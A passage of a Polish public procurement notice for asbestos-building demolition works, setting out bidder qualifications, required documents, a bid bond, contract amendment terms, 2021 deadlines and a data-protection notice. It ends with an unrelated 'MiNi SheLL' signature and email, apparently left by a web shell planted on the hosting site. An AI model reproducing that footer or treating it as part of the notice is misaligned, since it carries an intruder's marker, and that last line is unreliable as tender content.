spełni warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował kierownikiem robót w branży konstrukcyjno – budowlanej, posiadającym ważne uprawnienia - bez ograniczeń, do pełnienia samodzielnych funkcji technicznych w budownictwie i do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej, uzyskane zgodnie <br/>z przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U z 2020r. poz. 1333 ze zm.) oraz rozporządzeniem Ministra Transportu <br/>i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (tekst jednolity Dz. U. Nr 83, poz. 578 ze zm.).<br/>Osoba posiadająca ww. uprawnienia budowlane (zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r o samorządach zawodowych architektów oraz inżynierów budownictwa Dz. U z 2019 r poz. 1117) musi być wpisana na listę członków właściwej izby samorządu zawodowego oraz posiadać aktualne ubezpieczenie od odpowiedzialności cywilnej za szkody, które mogą wynikać w związku z wykonywaniem samodzielnych funkcji technicznych w budownictwie. <br/>Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (t.j. Dz. U. z 2020 r., poz. 1333 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2020 r. poz. 220 ze zm.).<br/>b)	Doświadczenie zawodowe - Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej dwie roboty budowlane polegającą na wykonaniu rozbiórki budynku lub budowli zawierających azbest o wartości nie mniejszej niż 500 000,00 PLN brutto każda. <br/>UWAGA: w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, nie dopuszcza się sumowania doświadczenia w celu spełnienia warunku udziału <br/>w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz osób, na potwierdzenie spełniania warunku w postępowaniu określonego w § 5 ust. 1 pkt 4 lit. a SWZ, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją <br/>o podstawie do dysponowania tymi osobami. <br/><br/>2. Wykaz robót budowlanych, na potwierdzenie spełniania warunku w postępowaniu określonego w § 5 ust. 1 pkt 4 lit. b SWZ, wykonanych nie wcześniej niż w okresie ostatnich <br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz <br/>z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenia, o których mowa w § 7 ust. 1 SWZ, zgodne co do treści ze wzorem zawartym w załączniku nr 2 do SWZ; <br/>2. Pełnomocnictwo (jeśli dotyczy),<br/>3. W przypadku Wykonawców wspólnie ubiegających się o zamówienie - pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>4. Zobowiązanie podmiotu trzeciego do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji niniejszego zamówienia zgodne co do treści ze wzorem zawartym w załączniku nr 6 do SWZ (jeśli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Ustala się wadium w wysokości 11 000,00 zł.<br/>2.	Wadium należy wnieść przed upływem terminu składania ofert.<br/>3.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy <br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego nr: 69 1130 1017 0020 1236 1520 0002, w tytule przelewu należy wskazać, jakiego postępowania dotyczy.<br/>5.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>6.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2–4, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>7.	Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp.<br/>8.	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o wykonie zamówienia:<br/>1) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenia<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy,<br/>2) Do oferty wspólnej dołączają pełnomocnictwo,<br/>3) Wszelką korespondencję w postępowaniu Zamawiający kierować będzie do wskazanego<br/>pełnomocnika.<br/>4) Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania następujących zmian w treści zawartej umowy:<br/>1)	zmiany Wykonawcy w przypadku:<br/>a)	zmiany formy prawnej prowadzonej działalności gospodarczej przez Wykonawcę, w szczególności połączenie, przejęcie lub innego przekształcenia Wykonawcy, jak również w razie ogłoszenia upadłości lub likwidacji Wykonawcy;<br/>b)	śmierci Wykonawcy będącego osobą fizyczną, prowadzącego samodzielnie działalność gospodarczą;<br/>2)	zmiany adresu siedziby firmy Wykonawcy w przypadku zmiany tych danych w trakcie realizacji umowy;<br/>3)	wystąpienia (ujawnienia) w trakcie realizacji umowy okoliczności uzasadniających dokonanie uściśleń/uzupełnień/zmian postanowień umownych korzystnych dla Zamawiającego. W powyższej sytuacji wynagrodzenie Wykonawcy nie zostanie zwiększone;<br/>4)	zmiany terminów określonych w § 2 ust 1 i §4 ust. 1 i 2 PPU, w przypadku wystąpienia następujących okoliczności:<br/>a)	przestojów i opóźnień zawinionych przez Zamawiającego,<br/>b)	działania siły wyższej mającej bezpośredni wpływ na termin wykonania robót, <br/>c)	wystąpienia warunków atmosferycznych uniemożliwiających wykonanie robót ze względów technologicznych,<br/>d)	będące następstwem działania innych organów, w szczególności: Policja, Straż Pożarna, Starostwo Powiatowe,<br/>e)	odkrycie przez Wykonawcę podczas prowadzenia prac, obiektów lub infrastruktury podziemnej, których Zamawiający nie wykazał w dokumentach zamówienia.<br/>2.	Przedłużenie terminu wykonania przedmiotu umowy następuje na pisemny wniosek Wykonawcy zawierający dokumenty wydane przez właściwe urzędy lub jednostki potwierdzające zaistnienie ww. szczególnych okoliczności, złożony w siedzibie Zamawiającego przed upływem terminu wykonania umowy.<br/>3.	W razie wątpliwości, przyjmuje się, że nie stanowią zmiany Umowy następujące zmiany:<br/>1)	danych związanych z obsługą administracyjno-organizacyjną Umowy,<br/>2)	osoby sprawującej nadzór ze strony Zamawiającego,<br/>3)	danych teleadresowych.<br/>4. Wszystkie możliwości ewentualnych zmian postanowień zawartej umowy w stosunku do treści oferty określone zostały w projektowanych postanowieniach umowy stanowiących załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-05 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. informacji zawartej w Sekcji III pkt 3.15.)<br/>6. Informacja o wymogu/dobrowolności podania danych osobowych<br/>Podanie Pani/Pana danych osobowych w związku z udziałem w postępowaniu o udzielenie<br/>zamówienia ma charakter dobrowolny, ale jest niezbędne do wzięcia w nim udziału.<br/>7. Prawa osób, których dane dotyczą<br/>Zgodnie z RODO przysługuje Pani/Panu:<br/>1) prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>2) prawo do sprostowania (poprawiania) swoich danych;<br/>3) prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje<br/>w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach sprawowania<br/>władzy publicznej;<br/>4) prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć<br/>możliwość skorzystania z tego prawa.<br/>Jeżeli chce Pani/Pan skorzystać z któregokolwiek z tych uprawnień, prosimy o kontakt z<br/>Inspektorem Ochrony Danych Osobowych, wskazany w pkt 2 lub pisemnie na adres<br/>korespondencyjny, wskazany w pkt 1.<br/>Zgodnie z RODO, każdej osobie, której dane są przetwarzane przysługuje prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>8. Zautomatyzowane podejmowanie decyzji<br/>W oparciu o Pani/Pana dane osobowe administrator nie będzie podejmował wobec Pani/Pana<br/>zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania.<br/>9. Przekazywanie danych poza Europejski Obszar Gospodarczy<br/>W związku z jawnością postępowania o udzielenie zamówienia publicznego Pani/Pana dane<br/>mogą być przekazywane do państw trzecich (tj. państwa, które nie należy do Europejskiego<br/>Obszaru Gospodarczego obejmującego Unię Europejską, Norwegię, Liechtenstein i Islandię), z<br/>zastrzeżeniem, o którym mowa w punkcie 4.<br/><br/>Informacja dodatkowa do Sekcji IV pkt 4.2.10.)<br/>1.	Termin wykonania zamówienia nie może być dłuższy niż 100 dni kalendarzowych licząc od dnia przekazania placu rozbiórki przez Zamawiającego, w tym:<br/>1)	Termin wykonania robót rozbiórkowych (zakończonych podpisaniem protokołu końcowego robót) nie może być dłuższy niż 60 dni kalendarzowych licząc od dnia przekazania placu rozbiórki – niniejszy termin stanowi jedno z kryteriów oceny ofert,<br/>2)	Termin wykonania prac określonych w § 3 ust. 5 lit. e SWZ nie może być dłuższy niż 40 dni od dnia podpisania protokołu końcowego robót.<br/>2.	Termin wykonania zamówienia jest jednym z kryteriów oceny ofert, szczegółowe zasady określenia terminu wykonania zamówienia i przyznawania punktów za to kryterium określa <br/>§ 14 SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com